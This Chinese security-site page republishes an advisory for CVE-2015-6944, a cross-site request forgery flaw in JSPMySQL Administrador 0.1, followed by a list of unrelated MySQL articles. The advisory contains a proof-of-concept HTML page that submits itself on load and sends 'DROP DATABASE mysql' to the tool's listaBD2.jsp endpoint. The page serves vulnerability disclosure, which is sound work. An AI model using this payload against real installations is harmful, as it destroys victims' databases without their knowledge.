安科网

JSP/MySQL Administrador Web跨站请求伪造漏洞(CVE-2015-6944)

PengQ

PengQ

2015-09-16

关注 关注
JSP/MySQL Administrador Web跨站请求伪造漏洞(CVE-2015-6944)


发布日期:2015-09-15
更新日期:2015-09-16

受影响系统:

JSPMySQL Administrador JSPMySQL Administrador 0.1

描述:

CVE(CAN) ID: CVE-2015-6944

JSPMySQL Administrador是JSP技术Web服务器上MySQL数据库的远程管理工具。

JSP/MySQL Administrador Web 1在实现上存在跨站请求伪造漏洞,远程攻击者通过sys/sys/listaBD2.jsp的cmd参数,利用此漏洞可劫持用户的身份验证请求。

<*来源:hyp3rlinx
 
  链接:http://www.securityfocus.com/archive/1/archive/1/536406/100/0/threaded
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

hyp3rlinx ()提供了如下测试方法:

<!DOCTYPE>
< html>
< head>
< title>JSP-MYSQL-ADMIN-CSRF</title>

< body onLoad="doit()">

< script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}

< !-- CSRF DROP MYSQL DATABASE -->

< form id="HELL" action="http://localhost:8081/sys/sys/listaBD2.jsp" method="post">
< input type="text" name="cmd" value="DROP DATABASE mysql"/>
< input type="text" name="btncmd" value="Enviar" />
< input type="text" name="bd" value="mysql" />
< /form>

建议:

厂商补丁:

JSPMySQL Administrador
----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

https://sites.google.com/site/mfpledon/producao-de-software

mysql jsp 跨站请求伪造 web技术 跨站攻击 mysql数据库 漏洞

PengQ

PengQ

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

MySQL主从复制原理以及需要注意的地方

最近在写Mycat专题,由于不少小伙伴最近要出去面试,问我能不能简单写下MySQL的主从复制原理和注意事项,因为在之前的面试中被问到了这些问题。 Master 将数据改变记录到二进制日志中,也就是配置文件 log-bin 指定的文件, 这些记录叫做二进制日

emmm00 2020-11-17

Mysql联表update数据的示例详解

在MySQL中,可以在 UPDATE语句 中使用JOIN子句执行跨表更新。employees表将存储在员工编号,姓名,工作表现和工资的数据。employees 和 merits 表之间以是 performance 字段相关联的。对于 employees 表

王艺强 2020-11-17

mysql 8.0.22 安装配置图文教程

解压后的目录并没有的my.ini文件,没关系可以自行创建在安装根目录下添加的my.ini ,写入基本配置:。# 允许连接失败的次数。初始化MySQL,在安装时,避免权限问题出错我们尽量使用管理员身份运行CMD,否则在安装时会报错,会导致安装失败的情况,如下

aydh 2020-11-12

MySQL用truncate命令快速清空一个数据库中的所有表

用文本编辑器把每条truncate语句前后的“|”替换为空字符,方便后面一次复制多条执行。truncate与drop是DDL语句,执行后无法回滚;delete是DML语句,可回滚。truncate会清空表中的所有行,但表结构及其约束、索引等保持不变;dro

世樹 2020-11-11

修改MySQL8.0 默认的数据目录(快捷操作无配置)

使用场景:我们使用的是阿里云,单独购买了数据盘,MySQL 8.0 数据库默认装在系统盘上,为了考虑安全性和空间问题,我们需要将默认的数据库目录更改到其它位置。操作系统:CentOS 7.6 数据库:MySQL 8.0 查看我本人更多原创文章,请点击

zry 2020-11-11

阿里云服务器安装Mysql数据库的详细教程

由于在学习过程中需要安装zookeeper,我的虚拟机一直有问题,就够买了阿里云服务器。安装完zookeeper后想着把数据库也安装在服务器上,释放一下电脑的压力,在安装数据库的时候遇到了很多问题,通过查看有些大佬的作品终于安装好了数据库。现在就我遇到的问

URML 2020-11-11

MySQL中的undo日志

我们知道,MySQL中的redo日志记录了事务的行为,在服务器宕机的时候,可以通过重做事务来达到恢复数据的目的,然而,有的时候,事务还有回滚的需求,也就是说,我们需要知道某条在变成当前情况之前的样子,这种情况下,undo日志就派上用场了。也就是说,undo

spurity 2020-11-10

php7连接MySQL实现简易查询程序的方法

假设我们制作的是分班情况查询程序,将使用PHP7的环境以PDO的方式连接MySQL。通过学号和姓名查询自己所在班级。准备就绪,开始吧,现在!echo "<tr><th>学号</th><th>姓名&l

yifangs 2020-10-13

JDBC连接MySQL

String sql = "select * from users where name=?String id = rs.getString;//1代表数据库中表的列数,id在第一列也可以!!!

Andrea0 2020-09-18

Uber为什么放弃Postgres选择迁移到MySQL?

Uber 的早期架构包含了一个用 Python 开发的单体后端应用程序,这个应用程序使用 Postgres 作为数据存储。从那个时候开始,Uber 的架构已经发生了巨大变化,变成了微服务,并采用新的数据平台模型。具体地说,之前使用 Postgres 的地方

Ida 2020-09-16

聊聊MySQL中的参数

在前面一些文章中,经常能看到介绍某某参数的作用,可能有些小伙伴仍搞不清楚 MySQL 参数是啥。我们所说的参数在官方文档中称为 系统变量,不同的变量有着不同的作用。MySQL 服务端维护了许多表示其配置的系统变量,所有变量均有默认值。若会话变量未单独设置,

ltd00 2020-09-12

shell脚本定时备份MySQL数据库数据并保留指定时间

公司用到的MySQL数据库,经常有同事通过一顿骚操作把一些关键的配置数据误删,每次恢复都要花上不少时间,于是写了个shell脚本,结合corntab每天凌晨备份数据库,并保留7天。同样的备份脚本也可用于生产环境MySQL数据库定时备份。上述脚本中指定了要备

tufeiax 2020-09-03

Mysql误删数据解决方案及kill语句原理

使用flashback工具闪回,把数据恢复回来。原理是修改binlog的内容,拿回原库重放,需要确保binlog_format=row和binlog_row_imsge=Full. 如果是insert,将binlog event类型是write_rows

xjd0 2020-09-10

MySQL 如何修改root用户的密码

mysql> set password for 用户名@localhost = password;关闭正在运行的MySQL服务。打开DOS窗口,转到mysql\bin目录。--skip-grant-tables的意思是启动MySQL服务的时候跳过权限

greatboylc 2020-09-10

通过实例解析MySql CURRENT_TIMESTAMP函数

`text` varchar DEFAULT '' COMMENT '内容',那么如何设置一个具体的默认时间呢?

adsadadaddadasda 2020-09-08

mysql主从复制配置过程

配置完毕后,重启数据库: service mysqld restart. 通过phpmyadmin,添加新用户,并授予REPLICATION SLAVE权限。或者通过root用户登录到mysql,赋予权限:。其中repl是用户名,password是该用户的

疯狂老司机 2020-09-08

Golang操作MySql数据库的完整步骤记录

MySQL是业界常用的关系型数据库,在平时开发中会经常与MySql数据库打交道,所以在接下来将介绍怎么使用Go语言操作MySql数据库。Go语言中的database/sql包提供了保证SQL或类SQL数据库的泛用接口,并不提供具体的数据库驱动。我们常用的数

CoderToy 2020-11-16

MySQL数据类型优化原则

MySQL支持的数据类型很多,选择正确的数据类型对于高性能至关重要。下面几个简单的原则都有助于做出更好的选择。应该尽量使用可以正确储存数据的最小数据类型。如果无法确定哪个数据类型时最好的,就选择你认为不会超过范围的最小类型。比如用MySQ内建的类型而不是使

ribavnu 2020-11-16

专业级的MySQL开发设计规范及SQL编写规范

在团队开发过程中为了项目的稳定,代码的高效,管理的便捷制定内部种开发设计规范是必不可少的,命名规范的对象是指数据库SCHEMA、表TABLE、索引INDEX、约束CONSTRAINTS等的命名约定。数据库创建时必须添加默认字符集和校对规则子句。设计应至少满

bianruifeng 2020-11-16

Mysql 查询JSON结果的相关函数汇总

计算 JSON 深度,计算方式 {} [] 有一个符号即为一层,符号下有数据增加一层,复杂 JSON 算到最深的一次为止,官方文档说 null 值深度为 0,但是实际效果并非如此,列举几个例子。计算 JSON 最外层或者指定 path 的长度,标量的长度为

wangshuangbao 2020-11-13
PengQ

PengQ

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号